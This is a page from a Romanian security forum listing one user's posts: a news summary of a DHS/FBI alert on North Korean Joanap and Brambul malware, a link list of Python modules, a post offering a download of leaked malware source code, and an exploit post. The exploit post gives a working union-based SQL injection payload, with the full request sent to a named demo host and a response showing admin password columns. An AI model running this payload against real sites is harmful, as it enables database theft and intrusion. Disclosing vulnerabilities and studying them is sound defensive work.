Fi8sVrs's Content - Page 20 - Romanian Security Team

FBI issues alert over two new malware linked to Hidden Cobra hackers

Fi8sVrs posted a topic in Stiri securitate

The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra. Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world. The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016. Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world. The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one. Joanap—A Remote Access Trojan According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations. The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments. Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device. Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management. During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran. Brambul—An SMB Worm Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems. The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware. Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system. The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script." DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government. DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications. Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Via thehackernews.com

May 30, 2018
- joanap
- hidden cobra
- (and 1 more)
  Tagged with:

Facebook Clone Script 1.0.5 - 'search' SQL Injection

Fi8sVrs posted a topic in Exploituri

# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection # Date: 2018-05-29 # Exploit Author: L0RD # Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/ # Version: 1.0.5 # Tested on: Win 10 # POC : SQLi : # Parameter : search # Type : Union based # Payload : 1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_schema=schema()# # Request POST /demo/fbclone/top-search.php HTTP/1.1 Host: smsemailmarketing.in User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://smsemailmarketing.in/demo/fbclone/setting.php Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 231 Connection: keep-alive search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_schema=schema()# # Response HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Tue, 29 May 2018 17:12:31 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 5370 <a href='friend-profile.php?id='><img src="images/unknown.jpeg" height="40px" width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description </a></div> Source

May 30, 2018

Malware source code samples

Fi8sVrs posted a topic in Reverse engineering & exploit development

Malware source code samples leaked online uploaded to GitHub for those who want to analyze the code. malware Malware source code samples uploaded to GitHub for those who want to analyze the code. Alina Spark (Point of Sales Trojan) Bleeding Life 2 (Exploit Pack) Carberp (Botnet) Carberp (Banking Trojan) Crimepack 3.1.3 (Exploit Pack) Dendroid (Android Trojan) Dexter v2 (Point of Sales Trojan) Eda2, Stolich, Win32.Stolich (Ransom) Sednit, Fancy Bear, APT28, Sofacy, Strontium (Gmail C2C) FlexiSpy (Spyware) Fuzzbunch (Exploit Framework) GMBot (Android Trojan) Gozi-ISFB - (Banking Trojan) Grum (Spam Bot) Hacking Team RCS (Remote Control System) Hidden Tear (Ransom) KINS (Banking Trojan) Mirai (IoT Botnet) Pony 2.0 (Stealer) PowerLoader (Botnet) RIG Front-end (Exploit Kit) Rovnix (Bootkit) Tinba (Tiny ASM Banking Trojan) TinyNuke, Nuclear Bot, Micro Banking Trojan, NukeBot (Banking Trojan) Trochilus, RedLeaves (RAT) ZeroAccess (Toolkit for ZeroAccess/Sirefef v3) Zeus (Banking Trojan) Disclaimer This repository is for research purposes only, the use of this code is your responsibility. I take NO responsibility and/or liability for how you choose to use any of the source code available here. By using any of the files available in this repository, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATION and/or RESEARCH purposes ONLY. Download: malware-master.zip Source

May 29, 2018
- 1

Awesome Python Modules

Fi8sVrs posted a topic in Programare

Awesome list of Python modules repositories & APIs httphq : https://github.com/Lispython/httphq httpie : https://github.com/kracekumar/httpie httpie : https://github.com/jkbrzt/httpie httpbin : https://github.com/Runscope/httpbin requests-oauthlib : https://github.com/requests/requests-oauthlib requests-runscope : https://github.com/Runscope/requests-runscope twitter : https://github.com/sixohsix/twitter twython : https://github.com/ryanmcgrath/twython urllib3 : https://github.com/shazow/urllib3 twarc : https://github.com/edsu/twarc requests : https://github.com/kennethreitz/requests python-oauth2 : https://github.com/joestump/python-oauth2 python-oauth : https://github.com/leah/python-oauth/ bitly-api-python : https://github.com/bitly/bitly-api-python PastebinAPI : https://github.com/Morrolan/PastebinAPI PastebinPython : https://github.com/six519/PastebinPython httpcache : https://github.com/Lukasa/httpcache unstdlib.py : https://github.com/shazow/unstdlib.py requests-toolbelt : https://github.com/sigmavirus24/requests-toolbelt github3.py : https://github.com/sigmavirus24/github3.py uritemplate : https://github.com/sigmavirus24/uritemplate twython : https://github.com/ryanmcgrath/twython rfc3986 : https://github.com/sigmavirus24/rfc3986 simplejson : https://github.com/simplejson/simplejson httplib2 : https://github.com/httplib2/httplib2 app-engine-tutorial : https://github.com/jcgregorio/app-engine-tutorial pyoauth : https://github.com/gorakhargosh/pyoauth cachecontrol : https://github.com/sigmavirus24/cachecontrol python-interview-questions : https://github.com/sigmavirus24/python-interview-questions hyper : https://github.com/Lukasa/hyper grequests : https://github.com/kennethreitz/grequests httpcli : https://github.com/dolph/httpcli ssl : https://github.com/pypa/ssl sslfix : https://github.com/denik/sslfix clint : https://github.com/kennethreitz/clint requests-data-schemes : https://github.com/sigmavirus24/requests-data-schemes omnijson : https://github.com/kennethreitz/omnijson py-oauth2 : https://github.com/liluo/py-oauth2 oauth2lib : https://github.com/NateFerrero/oauth2lib python-oauth2 : https://github.com/joestump/python-oauth2 pyoauth : https://github.com/gorakhargosh/pyoauth requests-oauthlib : https://github.com/requests/requests-oauthlib python-oauth2 : https://github.com/wndhydrnt/python-oauth2 nose : https://github.com/nose-devs/nose PyGithub : https://github.com/PyGithub/PyGithub python : https://github.com/python facebook-sdk : https://github.com/mobolic/facebook-sdk python-instagram : https://github.com/mobolic/python-instagram soundcloud-python : https://github.com/soundcloud/soundcloud-python python-twitter : https://github.com/bear/python-twitter tweepy : https://github.com/tweepy/tweepy beautifulsoup : https://code.launchpad.net/beautifulsoup html-extractor : https://github.com/lzjun567/html-extractor paramiko : https://github.com/paramiko/paramiko pxssh.html : http://pexpect.sourceforge.net/pxssh.html bpython : https://github.com/bpython/bpython ssh : https://github.com/bitprophet/ssh json-spec : https://github.com/johnnoone/json-spec isort : https://github.com/timothycrosley/isort natsort : https://github.com/SethMMorton/natsort wakeonlan : https://github.com/ghickman/wakeonlan phenny : https://github.com/sbp/phenny pycurl.io : http://pycurl.io/ scrapy.org : https://scrapy.org/ scrapy : https://github.com/scrapy/ BeautifulSoup : https://www.crummy.com/software/BeautifulSoup/ django : https://github.com/django/django YouCompleteMe : https://github.com/Valloric/YouCompleteMe sentry : https://github.com/getsentry/sentry ansible : https://github.com/ansible/ansible tornado : https://github.com/tornadoweb/tornado flask : https://github.com/mitsuhiko/flask cdwanze.github.io : http://cdwanze.github.io/ tweepy : https://github.com/tweepy/tweepy auth_tutorial.html : https://pythonhosted.org/tweepy/auth_tutorial.html google-api-python-client : https://github.com/google/google-api-python-client/ uritemplate : https://github.com/sigmavirus24/uritemplate pyopenssl : https://github.com/pyca/pyopenssl pycrypto : https://pypi.python.org/pypi/pycrypto pycrypto : https://github.com/dlitz/pycrypto googl-python : https://github.com/igrishaev/googl-python pyshorteners : https://github.com/ellisonleao/pyshorteners xmpppy : https://github.com/normanr/xmpppy irc-transport : https://github.com/normanr/irc-transport xmppd : https://github.com/normanr/xmppd aafm : https://github.com/sole/aafm requests-oauth : https://github.com/maraujop/requests-oauth HTTPretty : https://github.com/gabrielfalcao/HTTPretty hawkpost : https://github.com/whitesmith/hawkpost python-php : https://github.com/joshmaker/python-php A simple echo server to inspect http web requests : https://gist.github.com/huyng/814831 http://www.google.co.in/search?client=ms-opera-mini&channel=new&gws_rd=cr&hl=en&ie=UTF-8&q=Simple+Server+github+python+ proxy2.py : https://github.com/inaz2/proxy2/blob/master/proxy2.py proxy.py : https://github.com/abhinavsingh/proxy.py http://www.google.co.in/search?q=python+proxy+tunnel+github+&client=ms-opera-mini&channel=new&gws_rd=cr&ei=FBlTWNXmEJfejwPlo53wDg placeholder : https://github.com/naftaliharris/placeholder MiscPython : https://github.com/pzelnip/MiscPython Downloads : http://twistedmatrix.com/trac/wiki/Downloads www.pythonchallenge.com : http://www.pythonchallenge.com/ jedi : https://github.com/davidhalter/jedi MagicPython : https://github.com/MagicStack/MagicPython pythonImproved : https://github.com/DonJayamanne/pythonImproved Miscellaneous#select-an-interpreter : https://github.com/DonJayamanne/pythonVSCode/wiki/Miscellaneous#select-an-interpreter pypa : https://github.com/pypa iframe_api_reference : https://developers.google.com/youtube/iframe_api_reference ponyorm.com : https://ponyorm.com/ vk_api : https://github.com/python273/vk_api list-of-python-api-wrappers#mercury---take-any-web-article-and-return-only-the-relevant-content : https://github.com/realpython/list-of-python-api-wrappers#mercury---take-any-web-article-and-return-only-the-relevant-content birdy : https://github.com/inueni/birdy python-bitcoinlib : https://github.com/petertodd/python-bitcoinlib bitcoin-python doc : http://laanwj.github.io/bitcoin-python/doc/ box-python-sdk : https://github.com/box/box-python-sdk Python 2 evernote : https://github.com/evernote/evernote-sdk-python pyfacebook : https://github.com/sciyoshi/pyfacebook/ uritemplate : https://github.com/sigmavirus24/uritemplate py-googletrans : https://github.com/ssut/py-googletrans status : https://github.com/avinassh/status snakes-on-a-droid : https://github.com/dmpayton/snakes-on-a-droid colour : https://github.com/vaab/colour python-scrapinghub : https://github.com/scrapinghub/python-scrapinghub python-photobucket : https://github.com/czpython/python-photobucket soundcloud-python : https://github.com/soundcloud/soundcloud-python python-telegram-bot : https://github.com/python-telegram-bot/python-telegram-bot TPB : https://github.com/thekarangoel/TPB pytumblr : https://github.com/tumblr/pytumblr unirest-python : https://github.com/Mashape/unirest-python Wikipedia : https://github.com/goldsmith/Wikipedia wiki-api : https://github.com/richardasaurus/wiki-api youtube-api : https://github.com/lalo73/youtube-api/ InstaLooter : https://github.com/althonos/InstaLooter python-progressbar : https://github.com/WoLpH/python-progressbar InstaRaider : https://github.com/akurtovic/InstaRaider docopt : https://github.com/docopt/docopt dateutil : https://github.com/dateutil/dateutil/ six : https://bitbucket.org/gutworth/six ThinkPython : https://github.com/AllenDowney/ThinkPython http-here : https://github.com/hustcc/http-here git-webhook : https://github.com/NetEaseGame/git-webhook AutomatorX : https://github.com/NetEaseGame/AutomatorX download5 : https://www.riverbankcomputing.com/software/pyqt/download5 CythonGSL : https://github.com/twiecki/CythonGSL A deobfuscator for PjOrion, python cfg generator and more : https://github.com/extremecoders-re/PjOrion-Deobfuscator disk-scheduling-visualizer : https://github.com/extremecoders-re/disk-scheduling-visualizer uncompyle6 - A native Python cross-version Decompiler and Fragment Decompiler. Follows in the tradition of decompyle, uncompyle, and uncompyle2. Introduction:uncompyle6 translates Python bytecode back into equivalent Python source code. It accepts bytecodes from Python version 2.1 to 3.6 or so, including PyPy bytecode and Dropbox’s Python 2.5 bytecode. https://github.com/rocky/python-uncompyle6/ C++ python bytecode disassembler and decompiler, Decompyle++ : https://github.com/zrax/pycdc 15280-pjorion-редактирование-компиляция-декомпиляция-обф : http://www.koreanrandom.com/forum/topic/15280-pjorion-редактирование-компиляция-декомпиляция-обф/ ptpython : https://github.com/jonathanslenders/ptpython pymux : https://github.com/jonathanslenders/pymux pyvim : https://github.com/jonathanslenders/pyvim asyncssh : https://github.com/ronf/asyncssh cryptography : https://github.com/pyca/cryptography pyopenssl : https://github.com/pyca/pyopenssl tls : https://github.com/pyca/tls awesome-python : https://github.com/vinta/awesome-python python-social-auth : https://github.com/omab/python-social-auth fuckitpy : https://github.com/ajalt/fuckitpy pyautogui : https://github.com/asweigart/pyautogui TrendingGithub : https://github.com/andygrunwald/TrendingGithub unikovcode : https://github.com/amake/unikovcode httplib2 : https://github.com/jcgregorio/httplib2 vitualenv-stable : https://virtualenv.pypa.io/en/stable/ virtualenv : https://github.com/pypa/virtualenv Flexget : https://github.com/Flexget/Flexget P0cL4bs : https://github.com/P0cL4bs pyenv-virtualenv : https://github.com/yyuu/pyenv-virtualenv scapy : http://www.secdev.org/projects/scapy/ scapy : https://github.com/secdev/scapy/ teeceepee : https://github.com/jvns/teeceepee Responder : https://github.com/lgandx/Responder psutil : https://pypi.python.org/pypi/psutil falcon : https://github.com/falconry/falcon www.hug.rest : http://www.hug.rest/ www.pythonanywhere.com : https://www.pythonanywhere.com/ IDA-Pro#tab=IDA_Python_Scripting : https://www.aldeid.com/wiki/IDA-Pro#tab=IDA_Python_Scripting forum.dabeaz.com : https://forum.dabeaz.com/ snarky.ca : https://snarky.ca/ instabot : https://github.com/ohld/instabot visualize.html : http://www.pythontutor.com/visualize.html simpleisbetterthancomplex.com : https://simpleisbetterthancomplex.com/ http://www.google.co.in/search?q=matplotlib+installation+via+pip+&client=ms-opera-mini&channel=new&gws_rd=cr&ei=QIWMWI2sIYSFmwGe27CoBg curio : https://curio.readthedocs.io/en/latest/ python-resources.html : http://pybit.es/python-resources.html python-pentest-tools : https://github.com/dloss/python-pentest-tools fbchat : https://github.com/carpedm20/fbchat/ ipython.org : http://ipython.org/ jupyter.org : http://jupyter.org/ www.scipy.org : http://www.scipy.org/ shootback : https://github.com/aploium/shootback pyporting.html : https://docs.python.org/3/howto/pyporting.html compatible_idioms.html : http://python-future.org/compatible_idioms.html unmessage : https://github.com/AnemoneLabs/unmessage scipy-lectures : http://www.scipy-lectures.org/index.html pyguide.html : https://google.github.io/styleguide/pyguide.html elements-of-python-style : https://github.com/amontalenti/elements-of-python-style pyrsistent : https://github.com/tobgu/pyrsistent tmate-io : https://github.com/tmate-io tmux.github.io : https://tmux.github.io/ requests-oauth : https://github.com/maraujop/requests-oauth googletrans.html : http://py-googletrans.readthedocs.io/en/latest/googletrans.html py-googletrans : https://github.com/ssut/py-googletrans robobrowser : https://github.com/jmcarp/robobrowser facebot : https://github.com/aldiferdiyan/facebot tweebot : https://github.com/aldiferdiyan/tweebot drat : https://github.com/drat reddit-twitter-bot : https://github.com/rhiever/reddit-twitter-bot mongoaudit : https://github.com/stampery/mongoaudit python-socketio : http://github.com/miguelgrinberg/python-socketio/ skinny-bones-jekyll : https://github.com/mmistakes/skinny-bones-jekyll tensorflow-tutorials : https://github.com/golbin/tensorflow-tutorials pywb : https://github.com/ikreymer/pywb instaloader : https://github.com/Thammus/instaloader aiohttp : https://github.com/KeepSafe/aiohttp pytwitterbot : https://github.com/Serneum/pytwitterbot dehoopla : https://github.com/neersighted/dehoopla LanguageClient-neovim : https://github.com/autozimu/LanguageClient-neovim IPProxyTool : https://github.com/awolfly9/IPProxyTool git-trend : https://github.com/manojkarthick/git-trend Yet another URL library https://github.com/aio-libs/yarl http://yarl.readthedocs.io/en/latest/ HTTPie + prompt_toolkit = an interactive command-line HTTP client featuring autocomplete and syntax highlighting https://github.com/eliangcs/http-prompt http://http-prompt.com/ A cross-platform module for manipulating WiFi devices. https://github.com/awkman/pywifi Linker : https://github.com/awkman/Linker contributing-hugh-lib : https://www.vinta.com.br/blog/2017/contributing-hugh-lib/ theastrologer : https://github.com/sandipbgt/theastrologer i_want_to_save_you_the_time_of_reading_this : https://www.reddit.com/r/Python/comments/5u64sd/i_want_to_save_you_the_time_of_reading_this/ ultrajson : https://github.com/esnme/ultrajson#benchmarks statistics : https://docs.python.org/3/library/statistics.html gettext : https://docs.python.org/3/library/gettext.html poedit.net : https://poedit.net/ trans_real.py : https://github.com/django/django/blob/1.10.3/django/utils/translation/trans_real.py#L90 py-hello-l10n : https://github.com/vanadium23/py-hello-l10n DjangoBlog : https://github.com/liangliangyy/DjangoBlog shadowsocks : https://github.com/shadowsocks/shadowsocks scikit-plot : https://github.com/reiinakano/scikit-plot curio : https://github.com/dabeaz/curio schedule : https://schedule.readthedocs.io/en/stable/ cherrypy.org : http://cherrypy.org/ pytricia : https://github.com/jsommers/pytricia twitter-photos : https://github.com/shichao-an/twitter-photos twitter-photos.shichao.io : https://twitter-photos.shichao.io/ mrw.wtf : https://github.com/nvbn/mrw.wtf poly-flask : https://wmginsberg.github.io/blog/poly-flask wmginsberg : https://mobile.twitter.com/wmginsberg poly-flask : https://github.com/wmginsberg/poly-flask torequests : https://github.com/ClericPy/torequests 579037-how-to-execute-x86-64-bit-assembly-code-directly-f : http://code.activestate.com/recipes/579037-how-to-execute-x86-64-bit-assembly-code-directly-f/ saltstack : https://github.com/saltstack kernel_install.html : https://ipython.readthedocs.io/en/latest/install/kernel_install.html hakyll : http://jaspervdj.be/hakyll requests_httpsproxy : https://github.com/phuslu/requests_httpsproxy Modernizes Python code for eventual Python 3 migration. Build on top of 2to3 https://github.com/mitsuhiko/python-modernize 3-tricks-for-mastering-docker-with-python-99876412348d#.cby45ayf5 : https://hackernoon.com/3-tricks-for-mastering-docker-with-python-99876412348d#.cby45ayf5 mocker : https://github.com/tonybaloney/mocker Lumberjack - Python Logging for Humans™: https://github.com/thesantosh/lumberjack setup.html : http://cassiopeia.readthedocs.io/en/latest/setup.html theZoo : https://github.com/ytisf/theZoo flint : https://github.com/twosigma/flint intro.html : https://websockets.readthedocs.io/en/stable/intro.html simple-websocket-server : https://github.com/dpallot/simple-websocket-server warpdrive : https://github.com/GrahamDumpleton/warpdrive warpdrive : http://warpdrive.readthedocs.io/en/latest/ putio-automator : https://github.com/datashaman/putio-automator nox : https://nox.readthedocs.io/en/latest/ flake8 configuration : https://flake8.readthedocs.io/en/latest/user/configuration.html hasgeek : https://github.com/hasgeek www.sayonetech.com : https://www.sayonetech.com/ python-development-india : https://www.aalpha.net/tech-expertise/python-development-india/ pyc2py : https://github.com/eduble/pyc2py 114103.html : https://www.egenix.com/mailman-archives/egenix-users/2006-October/114103.html Modern Django: A Guide on How to Deploy Django-based Web Applications in 2017 https://github.com/djstein/modern-django Python Telegram Bot API : https://github.com/eternnoir/pyTelegramBotAPI MLT2ImageConverter : https://github.com/tar-bin/MLT2ImageConverter Cool Instagram scripts, bots and API wrapper. Written in Python. https://instagrambot.github.io/instabot/ followpie : https://github.com/oh-moore/followpie pywikibot-core : https://github.com/wikimedia/pywikibot-core bots.html : https://www.fullstackpython.com/bots.html ~kirsle : https://www.npmjs.com/~kirsle Cross platform editing, debugging, linting, testing (and more) Python (2.7 to 3.6) code (including Jupyter support) using Visual Studio Code https://github.com/DonJayamanne/pythonVSCode Awesome autocompletion and static analysis library for python. https://github.com/davidhalter/jedi url_shortener_django : https://github.com/clickclickonsal/url_shortener_django dukpy : https://github.com/amol-/dukpy anaconda : http://damnwidget.github.io/anaconda/ configuring_apache_django_anaconda : http://ostrokach.github.io/posts/configuring_apache_django_anaconda/ ruruki : https://github.com/optiver/ruruki Machine learning, Facial expression recognition,Deep Learning Tutorials ,Data Science blogs,etc.: https://github.com/lazyprogrammer?tab=repositories https://github.com/rushter?tab=repositories https://github.com/lisa-lab https://lazyprogrammer.me/ https://mila.umontreal.ca/en/ PyMySQL : https://github.com/PyMySQL/PyMySQL/ vy : https://github.com/iogf/vy scrabble : https://github.com/benjamincrom/scrabble subtitle-downloader : https://github.com/manojmj92/subtitle-downloader imdb : https://github.com/manojmj92/imdb BeautifulSoup : https://www.crummy.com/software/BeautifulSoup/#Download project_euler : https://github.com/dhruvbaldawa/project_euler dhruvb blog : http://www.dhruvb.com/blog/ gcm-server.py : https://github.com/dhruvbaldawa/android_gcm/blob/master/gcm-server.py sms : https://github.com/dhruvbaldawa/Tutorials/tree/master/sms Image-Sorting : https://github.com/tanmay2893/Image-Sorting/tree/master fillerhide : https://github.com/shinigamiryuk/utility-scripts/blob/master/fillerhide LinkedInMailing : https://github.com/karangurnani/LinkedInMailing PypLebKV : http://pastebin.com/PypLebKV E3vVr4 : http://ideone.com/E3vVr4 follow-sync : https://github.com/kirsle/follow-sync pipfile : https://pypi.python.org/pypi/pipfile/ trio : https://github.com/python-trio/trio/ newspaper# : https://github.com/codelucas/newspaper# instarch : https://github.com/marvelhoax/instarch Pythonista : https://github.com/Sphinxs/Pythonista vintasoftware : https://github.com/vintasoftware splinter : https://github.com/cobrateam/splinter mongoengine_fuel : https://github.com/berinhard/mongoengine_fuel splinter : https://github.com/cobrateam/splinter rows : https://github.com/turicas/rows osantana : https://github.com/osantana dynaconf : https://github.com/rochacbruno/dynaconf model_mommy : https://github.com/vandersonmota/model_mommy releases : https://github.com/Microsoft/PTVS/releases LegendasTV-Downloader : https://github.com/NiJoao/LegendasTV-Downloader djang-cms : https://www.django-cms.org/en/ FacebookGraphAPI-Examples : https://github.com/nikhilkumarsingh/FacebookGraphAPI-Examples barcode.html#creating-barcodes-as-image : http://pythonhosted.org/pyBarcode/barcode.html#creating-barcodes-as-image Votr : https://github.com/danidee10/Votr Python_script : https://github.com/AymenDz/Python_script/ scrapy_python : https://github.com/arpitbbhayani/scrapy_python PyBuildTool : https://github.com/dozymoe/PyBuildTool twittor : https://github.com/PaulSec/twittor gcat : https://github.com/byt3bl33d3r/gcat fast-style-transfer : https://github.com/lengstrom/fast-style-transfer Lollypop is a new GNOME music playing application. https://github.com/gnumdk/lollypop lollypop-portal : https://github.com/gnumdk/lollypop-portal nltk : https://pypi.python.org/pypi/nltk/ scipys-new-lowlevelcallable-is-a-game-changer : https://ilovesymposia.com/2017/03/12/scipys-new-lowlevelcallable-is-a-game-changer/ Tornado-Async-STT : https://github.com/DominguesM/Tornado-Async-STT pyautogui : https://pyautogui.readthedocs.io/en/latest/ pywinauto.github.io : https://pywinauto.github.io/ www.sikuli.org : http://www.sikuli.org/ A tool that automatically formats Python code to conform to the PEP 8 style guide. https://github.com/hhatto/autopep8 Python PDF Parser pdfminer : https://github.com/euske/pdfminer pdfminer3k : https://github.com/jaepil/pdfminer3k pyPdf : http://pybrary.net/pyPdf/ shodan-python : https://github.com/achillean/shodan-python strftime.org : http://strftime.org/ Web-Browser : https://github.com/nickgermaine/Web-Browser 3d plotting for Python in the Jupyter notebook based on IPython widgets using WebGL: https://github.com/maartenbreddels/ipyvolume conda : https://conda.io/docs/index.html ONIOFF - Onion URL Inspector A simple tool - written in pure python - for inspecting Deep Web URLs (or onions). It takes specified onion links and returns their current status along with the site's title. https://github.com/k4m4/onioff Easy Html Parser is an AST generator for html/xml documents. You can easily delete/insert/extract tags in html/xml documents as well as look for patterns. https://github.com/iogf/ehp selenium navigating : http://selenium-python.readthedocs.io/navigating.html InsideReCaptcha : https://github.com/neuroradiology/InsideReCaptcha Eigenstyle : https://github.com/graceavery/Eigenstyle PyRarCrack : https://github.com/z4r4tu5tr4/PyRarCrack python-excel.org : http://www.python-excel.org/ apscheduler : https://apscheduler.readthedocs.io/en/latest/ swampy : http://www.greenteapress.com/thinkpython/swampy/index.html Software to automate the management and configuration of any infrastructure or application at scale. Get access to the Salt software package repository here: https://repo.saltstack.com https://github.com/saltstack/salt A sample load / stress testing https://github.com/DonerKebab/SampleLoadTesting Virtual IP Routing Services over OpenFlow networks http://routeflow.github.io/RouteFlow/ https://github.com/anhsirksai/RouteFlow/tree/vandervecken https://github.com/routeflow/RouteFlow python-docx : http://python-docx.readthedocs.io/en/latest/user/quickstart.html dataset : https://dataset.readthedocs.io/en/latest/ ArgParseInator : https://pypi.python.org/pypi/ArgParseInator http://www.google.co.in/search?q=uml&client=ms-opera-mini&channel=new&gws_rd=cr&ei=8C7wWIy9C4ezaaexsMgF Image-to-image translation using conditional adversarial nets: https://github.com/phillipi/pix2pix Poet helps you declare, manage and install dependencies of Python projects, ensuring you have the right stack everywhere. https://github.com/sdispater/poet meinheld is a high performance asynchronous WSGI Web Server (based on picoev) https://github.com/mopemope/meinheld http://meinheld.org SuperSight : https://github.com/CamilleMo/SuperSight shadowbroker : https://github.com/misterch0c/shadowbroker open-source jailbreaking tool for older iOS devices https://github.com/axi0mX/ipwndfu Python documentation generator. https://github.com/Ryanb58/tdoc Automatic firewall rule orchestator. https://github.com/videlanicolas/assimilator Styled Terminal Markdown Viewer https://github.com/axiros/terminal_markdown_viewer colorful : https://github.com/timofurrer/colorful Abusing vim's incorrect UTF-8 decoding https://github.com/bspammer/vimcryption latest : http://kim.readthedocs.io/en/latest/ flask-skeleton : https://github.com/mikeywaites/flask-skeleton nmap-converter : https://github.com/mrschyte/nmap-converter Django middleware that helps visualize your app's traffic in Kibana https://github.com/koslibpro/django-traffic zhihu-api : https://github.com/lzjun567/zhihu-api A fully decentralized network for distributing data https://github.com/lbryio/lbry Cuckoo Sandbox is an automated dynamic malware analysis system https://github.com/cuckoosandbox/cuckoo cookiecutter-django : https://github.com/pydanny/cookiecutter-django PcbDraw : https://github.com/yaqwsx/PcbDraw PyGithub : https://github.com/PyGithub/PyGithub OpenSnitch is a GNU/Linux port of the Little Snitch application firewall. https://github.com/evilsocket/opensnitch Advanced search language for Django https://github.com/ivelum/djangoql?utm_content=bufferf050c&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer Swagger/OpenAPI First framework for Python on top of Flask with automatic endpoint validation & OAuth2 support https://github.com/zalando/connexion A Flask extension to manage assets with Webpack. https://github.com/nickjj/flask-webpack A library for delivering one-line programming jokes https://github.com/CodeTengu/jokekappa One line jokes for programmers (jokes as a service) https://github.com/pyjokes/pyjokes pyjokes-bot : https://github.com/pyjokes/pyjokes-bot a very fast brute force webshell password tool https://github.com/sunnyelf/cheetah https://www.hackfun.org A Python script I use to pack IPSW for idevicererestore https://github.com/matteyeux/pypack Recent Commits to cowquotes:master cowquotes is inspired by cowsay and fortune https://github.com/oopsmonk/cowquotes python screenshot https://github.com/ponty/pyscreenshot python-optimus-api : https://github.com/keycdn/python-optimus-api A python package of Zeroth-Order Optimization (ZOOpt) https://github.com/eyounx/ZOOpt Image-to-image translation in PyTorch (e.g. horse2zebra, edges2cats, and more) https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix A simple library for interacting with Amazon S3. https://github.com/kennethreitz/bucketstore android-ndk-downloader : https://github.com/tzutalin/android-ndk-downloader Minimalist measurement of python code time https://github.com/ramonsaraiva/timy Bitcoin made easy https://github.com/ofek/bit Python SAML Toolkit https://github.com/onelogin/python-saml Multi-Order Coverage map module for Python https://github.com/grahambell/pymoc https://pypi.python.org/pypi/libsemigroups-python-bindings/0.2.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss https://pypi.python.org/pypi/deployv/0.9.17?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss ara : https://github.com/openstack/ara microcosm-pubsub : https://github.com/globality-corp/microcosm-pubsub Sahiti : https://github.com/harkrish1/Sahiti Google Cloud Platform Python Samples https://github.com/GoogleCloudPlatform/python-docs-samples Python package for fitting dielectric/Raman/IR spectral data with an arbitrary number of Debye, damped oscillator, and other lineshape functions https://github.com/delton137/spectrumfitter tap-gitlab : https://github.com/singer-io/tap-gitlab Uranium is an assembly framework for Python, designed to help assist with the assembling Python services. Uranium provides tools for dependency management, reuse of assembly scripts, configuration, and other common requirements for an assembly system. http://uranium.readthedocs.io/en/latest/ easy_google : https://github.com/Fryuni/easy_google Python REST client to interact with Replyify API https://github.com/replyify/replyify-python aiopogo - a Pokémon API in Python https://github.com/Noctem/aiopogo A Django template tag to convert Markdown to 